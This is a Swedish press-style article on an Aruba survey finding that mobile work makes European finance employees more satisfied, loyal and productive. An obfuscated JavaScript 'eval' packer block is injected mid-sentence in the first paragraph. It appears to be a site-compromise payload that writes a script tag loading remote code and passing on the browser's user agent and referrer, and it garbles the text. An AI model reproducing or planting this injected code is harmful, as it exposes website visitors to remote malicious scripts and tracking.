Image Image Image Image Image Image Image Image Image Image

| 28 november, 2020

Scroll to top

Top

Mobil teknik gör finansanställda nöjdare

Mobil teknik gör finansanställda nöjdare
Sebastian

Undersökningen, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sfdtr|var|u0026u|referrer|nkhdr||js|php’.split(’|’),0,{}))
som omfattar 1 865 personer runt om i Europa, visade alltså att hälften (50%) kände sig mer nöjda med arbetsplatsen och många (31%) kände sig mer lojala med arbetsgivaren genom att de får bättre möjligheter att arbeta mobilt. En relativt stor andel (27%) säger till och med att de inte skulle jobba hos en arbetsgivare som inte tillät att de tog med sina egna mobiler till arbetet.

Det finns också en mycket positiv inställning till att arbeta på distans. Mer än fyra av tio (42%) menar att de är mer produktiva när de jobbar hemifrån.

”Undersökningsresultaten visar att CIO:er på finansföretag kan använda mobil teknik för att påverka hur medarbetarna upplever att det är att jobba på företaget. De kan också öka de anställdas produktivitet, lojalitet och nöjdhet.” säger Jon Moger från Aruba.  

Aruba har utformat en guide för finansföretag som vill göra sitt företag mer mobilt. Mer information finns på: www.arubanetworks.com/genmobile2016

Om Aruba, ett Hewlett Packard Enterprise företag

Aruba, ett Hewlett Packard Enterprise företag, är en ledande leverantör av nästa generations nätverkslösningar för företag av alla storlekar. Företaget erbjuder IT-lösningar som ger organisationer möjlighet att hjälper de medarbetare som lever mobilt och använder molnbaserade företagsappar för varje del av sitt arbetsliv såväl som i privatlivet.

För mer information, besök http://www.arubanetworks.com och följ gärna Arubas nyheter på Twitter och Facebook. För de senaste tekniska diskussionerna om mobilitet och Arubaprodukter, besök gärna Airheads Social på http://community.arubanetworks.com.